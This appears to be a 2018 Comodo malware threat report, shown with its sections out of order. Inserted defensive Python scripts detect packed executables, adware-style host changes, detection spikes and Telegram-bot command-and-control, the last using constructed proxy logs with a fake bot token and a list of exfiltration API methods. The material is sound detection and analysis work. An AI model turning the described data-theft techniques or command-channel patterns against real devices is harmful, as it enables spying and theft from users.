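    """Return (name, virtual_size, raw_size, characteristics, raw_bytes) per section."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                          # section table follows optional header
    sections = []
    for i in range(num_sections):
        (name, vsize, _vaddr, rsize, rptr,
         _, _, _, _, chars) = struct.unpack_from(SECTION_HEADER, image, table + 40 * i)
        sections.append((name.rstrip(b"\0"), vsize, rsize, chars, image[rptr:rptr + rsize]))
    return sections


def packer_indicators(image: bytes, entropy_threshold: float = 7.0):
    """List human-readable indicators; an empty list means nothing packer-like was seen."""
    findings = []
    for name, vsize, rsize, chars, body in parse_sections(image):
        label = name.decode("latin-1")
        if name in KNOWN_PACKER_SECTIONS:
            findings.append(f"{label}: known packer section name")
        if rsize == 0 and vsize > 0:
            findings.append(f"{label}: no raw data but {vsize:#x} bytes virtual size (unpack destination)")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{label}: writable and executable")
        ent = shannon_entropy(body)
        if ent >= entropy_threshold:
            findings.append(f"{label}: entropy {ent:.2f} bits/byte (compressed or encrypted)")
    return findings


def build_pe(sections):
    """Assemble a minimal PE image from (name, virtual_size, raw_bytes, characteristics)."""
    opt_size = 224                                        # size of a PE32 optional header
    header_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_start = (header_len + 0x1FF) & ~0x1FF             # raw data aligned to 512 bytes
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt_size)
    bodies, ptr, vaddr = b"", raw_start, 0x1000
    for name, vsize, body, chars in sections:
        image += struct.pack(SECTION_HEADER, name.ljust(8, b"\0"), vsize, vaddr,
                             len(body), ptr if body else 0, 0, 0, 0, 0, chars)
        bodies += body
        ptr += len(body)
        vaddr += max(vsize, 0x1000)
    return image + bytes(raw_start - len(image)) + bodies


_rng = random.Random(2018)  # deterministic stand-in for compressed data
# Constructed UPX-like layout: empty UPX0 (unpack target), UPX1 holding the packed body.
PACKED_SAMPLE = build_pe([
    (b"UPX0", 0x20000, b"", 0xE0000080),
    (b"UPX1", 0x1000, bytes(_rng.getrandbits(8) for _ in range(4096)), 0xE0000040),
    (b".rsrc", 0x200, b"\0" * 512, 0xC0000040),
])
# Constructed unpacked layout: low-entropy code and data, no writable code section.
PLAIN_SAMPLE = build_pe([
    (b".text", 0x400, b"\x55\x8b\xec" * 300 + b"\xc3", 0x60000020),
    (b".data", 0x100, b"hello world\0" * 20, 0xC0000040),
])

if __name__ == "__main__":
    for label, image in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, packer_indicators(image) or ["no packer indicators"])
```

Pointing `packer_indicators` at the bytes of a real file gives a triage signal only; a high-entropy section may also be legitimate compressed resources, so treat the output as a reason to look closer, not a verdict.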
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
542 Unwanted Applications The unwanted application category is alarming in that users often install these applications inadvertently in the course of ordinary computer and Internet activity. Examples include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Software in this class includes free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
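The behaviors listed for Elex (5.4.1) and DealPly (5.4.2) all leave traces in a few well-known places: startup entries, the driver list, the DNS resolver configuration and the browser's homepage and search provider. The script below is an added example, not Comodo's tooling, showing how a defender compares a current host snapshot against a known-good baseline and scores the differences. Both snapshots, the allowed resolver set and the host paths are constructed for the example; on a real host the snapshot would be gathered with Autoruns, driverquery and Get-DnsClientServerAddress or their equivalents.

```python
"""Baseline comparison for the PUA behaviours described in 5.4.1 and 5.4.2.

Added example, not Comodo's code. Two host snapshots are compared: a known-good
baseline and a current one. Differences of the kind Elex and DealPly produce
(new startup entries, new drivers, changed DNS servers, changed homepage and
search provider) are reported with a severity. All data here is constructed.
"""
import re

# Constructed baseline for a hypothetical Windows host.
BASELINE = {
    "run_keys": {
        "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    },
    "drivers": {"tcpip", "ndis", "disk"},
    "dns_servers": ["10.0.0.2", "10.0.0.3"],
    "browser": {"homepage": "https://intranet.example", "search": "google"},
}

# Constructed snapshot taken after an Elex/DealPly-style installation.
CURRENT = {
    "run_keys": {
        "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
        "ElexUpdate": r"C:\Users\bob\AppData\Roaming\elex\upd.exe",
    },
    "drivers": {"tcpip", "ndis", "disk", "elxflt"},
    "dns_servers": ["203.0.113.53", "10.0.0.3"],
    "browser": {"homepage": "http://search.deals.example", "search": "dealply"},
}

# Resolvers this host is permitted to use (assumption for the example).
ALLOWED_DNS = {"10.0.0.2", "10.0.0.3"}
# Startup entries that launch from user-writable folders are a stronger signal.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.IGNORECASE)


def audit(baseline, current, allowed_dns=ALLOWED_DNS):
    """Return a list of (severity, finding); an empty list means nothing changed."""
    findings = []

    for name, cmd in current["run_keys"].items():
        if name not in baseline["run_keys"]:
            sev = "high" if USER_WRITABLE.search(cmd) else "medium"
            findings.append((sev, f"new startup entry {name} -> {cmd}"))
        elif cmd != baseline["run_keys"][name]:
            findings.append(("high", f"startup entry {name} changed to {cmd}"))

    for drv in sorted(current["drivers"] - baseline["drivers"]):
        findings.append(("high", f"new kernel driver {drv}"))

    for srv in current["dns_servers"]:
        if srv not in allowed_dns:
            findings.append(("high", f"DNS server {srv} not in allowed set"))

    for key in ("homepage", "search"):
        if current["browser"][key] != baseline["browser"][key]:
            findings.append(("medium", f"browser {key} changed to {current['browser'][key]}"))

    return findings


if __name__ == "__main__":
    for sev, text in audit(BASELINE, CURRENT):
        print(f"[{sev}] {text}")
```

The DNS check is deliberately an allow-list rather than a diff: a resolver that is merely different from the baseline may be a legitimate DHCP change, but one outside the organization's own resolvers is exactly the hijack the Elex description warns about.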
543 Unsafe Applications Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and are frequently bundled with additional malware that users install inadvertently. Because a crack typically has to run with administrative privileges, and the user who installs it typically excludes it from antivirus scanning, it is an ideal carrier for a trojan.
This malware type is a bit different in that while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) rank second and third respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the top malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not only in one but in multiple verticals, which makes them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. Note that "Kryptik" is also a generic detection name that several vendors apply to heavily obfuscated or packed trojans, so these reports do not necessarily describe a single codebase.
Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be among the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. Form grabbing hooks the browser's own HTTP functions and captures submitted form fields before they are encrypted for transport, which is why TLS alone does not protect credentials from it. Zeus has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that the target's computer already has a virus and needs to be cleaned.
In conclusion, trojans are dangerous malware found within every vertical and used for a wide variety of cyberattacks. Strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. The major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one possible explanation for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, and immediately began to fulfill them via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes. Note that March 13 precedes the Q2 window covered by the rest of this report; this timeline extends back into March.
72 China This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 stands out as the single most prominent day. One explanation for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.
73 South Korea
National security events always attract the attention of professional hackers, who collect the information that becomes the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that some person or institution was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo examined the detected malware further and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
75 Armenia
All major geopolitical events today are bathed in malware, because all activities, from social life to business, politics and national security affairs, are now mostly performed online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. This timeline provides an example: Armenia's 2018 political revolution coincided with Comodo's largest detection of malware within that country during Q2 2018.
76 Belarus
A common hacker refrain is that "information wants to be free". This timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018, is consistent with that argument. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
77 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. At the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had more than one cause. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital city, Kyiv, on May 26.
79 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
710 Finland, Russia, USA
Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity placed it almost exclusively in Vantaa, in the Helsinki metropolitan area, where the summit was at the time reported to be taking place. IP geolocation is only approximate at the city level and often resolves to the location of an ISP's infrastructure rather than of the end host, so this attribution should be read as indicative rather than precise.
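Every subsection of Section 7 rests on the same step: spotting a day whose detection count stands far above its neighbours, then looking for an event on that date. The following is an added example, not Comodo's code or telemetry, of making that first step reproducible. It scores each day against the median of the preceding two weeks in units of the median absolute deviation (MAD), a robust statistic that is not dragged upward by the spike itself the way a mean and standard deviation would be. The series is synthetic (a flat baseline with deterministic jitter, one modest bump that should not fire, and two injected spikes), and the start date is assumed to be the first day of Q2 2018.

```python
"""Quantifying the daily detection spikes that Section 7 reads off its charts.

Added example with constructed data, not Comodo's code or telemetry. Each day
is compared with the median of the preceding window, in units of that window's
median absolute deviation (MAD). Median and MAD are not pulled upward by the
spike itself, which a mean/standard-deviation rule would be.
"""
from datetime import date, timedelta
from statistics import median

Q2_START = date(2018, 4, 1)   # assumed start of the series


def robust_spikes(series, start=Q2_START, window=14, threshold=6.0):
    """Return [(date, count, score)] for days far above their trailing window."""
    flagged = []
    for i in range(window, len(series)):
        past = series[i - window:i]
        med = median(past)
        mad = median(abs(x - med) for x in past) or 1.0   # guard for a flat window
        score = (series[i] - med) / mad
        if score > threshold:
            flagged.append((start + timedelta(days=i), series[i], round(score, 1)))
    return flagged


def constructed_series(days=90):
    """Synthetic daily counts standing in for one country's detection timeline."""
    series = [1000 + (d * 37) % 200 for d in range(days)]   # baseline plus jitter
    series[55] += 200     # ordinary fluctuation: must not be flagged
    series[40] += 8000    # event-day spike of the kind 7.2 describes for June 4
    series[70] += 4000    # second, smaller spike
    return series


if __name__ == "__main__":
    for day, count, score in robust_spikes(constructed_series()):
        print(f"{day}: {count} detections, {score} MADs above the trailing median")
```

Finding the day is the easy half. A spike coinciding with a news item is a correlation, and the stronger evidence is what 7.4 did for North Korea: break the spike down by malware family and sensor, since a single customer's outbreak or a cracked-software bundle will explain many "geopolitical" peaks without any espionage at all.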
8 Conclusions In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals are increasingly hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361 or visit comodo.com
EUROPE: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania, +40 332 806 772
ASIA: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India, Tel +91 44 4562 2800, www.comodo.co.in
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository
418 RedAlert RedAlert changes between multiple "spy legends" to gain users' trust, wearing the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device for the following banking applications (Android package names):
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can also block access to some applications and sites, including Google Chrome, the Google Play Store, Gmail and YouTube.
419 Hero Rat The next digital spook, Hero Rat, acts mostly on Iranian territory. It spreads through third-party app stores, social networks and messengers.
Version 1: CloudVPN, MyIrancel, Mtproto, زیبانویس ("beautiful writing"), تلگرام همه کاره ("all-in-one Telegram"), Proxy, دوست یاب ("friend finder"), Telegram Ton, شارژ رایگان بگیر ("get free credit"), App Master, Anti Rat, PlatformA, فالورگیر نامحدود ("unlimited follower getter"), اینترنت رایگان ("free internet")
Disguises of Hero Rat
Its code is sold on a Telegram hacking channel, notably in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning that the app cannot run, but it keeps running in the background and starts spying. It steals text messages and audio recordings, makes calls, detects the device location, and so on. The newly infected device is controlled through Telegram bot functionality, which gives the operator a ready-made, TLS-protected command channel that blends into legitimate messenger traffic.
Hero Rat also disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram variants for the Iranian market.
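Telegram-bot control, as used by Hero Rat above, has one weakness from the operator's side: the implant must call the Telegram Bot API with a bot token in the URL path, while the real Telegram client speaks MTProto to Telegram's own data centres and never presents such a token. The script below is an added example, not Comodo's code, of turning that into a detection over web-proxy logs. The log lines, their field layout, the app package names (other than org.telegram.messenger, which is the official client) and the allow-list are all constructed for the example.

```python
"""Flagging Telegram-bot command and control of the kind Hero Rat uses (4.1.9).

Added example, not Comodo's code. An implant driven through a Telegram bot
must call the Bot API, https://api.telegram.org/bot<token>/<method>, to poll
for commands (getUpdates) and to upload stolen material (sendDocument and
friends). A non-messenger app hitting the Bot API is the tell. The proxy log
lines, their layout, the app names and the allow-list are all constructed.
"""
import re
from collections import defaultdict

# Bot tokens look like <numeric bot id>:<secret>; the secret length is not
# fixed by Telegram, so only a lower bound is assumed here.
BOT_API = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<method>\w+)")
LINE = re.compile(r"app=(?P<app>\S+) dst=(?P<dst>\S+) path=(?P<path>\S+)")
ALLOWED_BOT_APPS = {"com.example.itops.alerts"}          # sanctioned bot users
EXFIL_METHODS = {"sendDocument", "sendPhoto", "sendAudio", "sendVoice", "sendMessage"}

LOG = """\
2018-05-03T10:01:02Z app=org.telegram.messenger dst=149.154.167.51 path=/
2018-05-03T10:01:09Z app=com.cloudvpn.free dst=api.telegram.org path=/bot612345678:AAF3kQz9Lp2xH7vRt0Wm8Yc4nBd6Ue1Sj5Ka/getUpdates
2018-05-03T10:01:40Z app=com.cloudvpn.free dst=api.telegram.org path=/bot612345678:AAF3kQz9Lp2xH7vRt0Wm8Yc4nBd6Ue1Sj5Ka/sendDocument
2018-05-03T10:02:11Z app=com.example.itops.alerts dst=api.telegram.org path=/bot99887766:BBc0ntr0lledByITxxxxxxxxxxxxxxxxxxxx/sendMessage
2018-05-03T10:03:00Z app=com.android.chrome dst=api.telegram.org path=/bot612345678:AAF3kQz9Lp2xH7vRt0Wm8Yc4nBd6Ue1Sj5Ka/getUpdates
"""


def mask(secret):
    """Never log a full bot token: it is a live credential for that bot."""
    return secret[:4] + "..." + secret[-2:]


def find_bot_c2(log):
    """Return {app: {...}} for apps outside the allow-list that use the Bot API."""
    suspects = defaultdict(lambda: {"bot_id": None, "token_hint": None,
                                    "methods": set(), "exfil": False})
    for line in log.splitlines():
        m = LINE.search(line)
        if not m or m["dst"] != "api.telegram.org":
            continue
        b = BOT_API.match(m["path"])
        if not b or m["app"] in ALLOWED_BOT_APPS:
            continue
        rec = suspects[m["app"]]
        rec["bot_id"], rec["token_hint"] = b["bot_id"], mask(b["secret"])
        rec["methods"].add(b["method"])
        rec["exfil"] = rec["exfil"] or b["method"] in EXFIL_METHODS
    return dict(suspects)


if __name__ == "__main__":
    for app, rec in find_bot_c2(LOG).items():
        print(app, rec["bot_id"], rec["token_hint"], sorted(rec["methods"]), "exfil" if rec["exfil"] else "")
```

The bot id is worth recording even though the token is masked: every infected device reporting to the same bot id belongs to the same operator, which is how separate detections get grouped into one campaign. Without a TLS-inspecting proxy only the destination host is visible, in which case the detection degrades to "non-messenger app talking to api.telegram.org", which is still a useful hunt query.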
4110 Sonvpay The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS premium services, adding extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; if the user taps it, the malware begins working in the background, subscribing the user to services she did not order.
It reaches victims in the variety of disguises listed above.
4111 CoinHive The last entry in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining capability. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. However, she is not aware that another cybercriminal earlier infected CoinMiner with CoinHive. So the first attacker is herself a victim: a thief robbing a thief.
This story illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by month.
421 April 2018
Chart: Android-targeted malware detected in April 2018
422 May 2018
Chart: Android-targeted malware detected in May 2018
423 June 2018
Chart: Android-targeted malware detected in June 2018
5 Malware in Q2 2018 The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world. Note that detection counts depend on where Comodo's sensors and customers are deployed as well as on where malware is active, so the country rankings in the sections below should be read with that sampling bias in mind.
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network services as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
511 Generic Worms This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more. Persistent detections of worms this old generally indicate unpatched legacy hosts and infected removable media rather than new campaigns.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm detections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
512 Net Worms A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
513 Email Worms Email worms are nasty in that they travel between victim computers as mail attachments, and many variants combine that with other vectors such as software exploits and autorun functionality on removable media.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.
515 IM Worms Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
52 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once installed on a system or network, they can be devastating to personal or enterprise security.
521 Backdoors A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
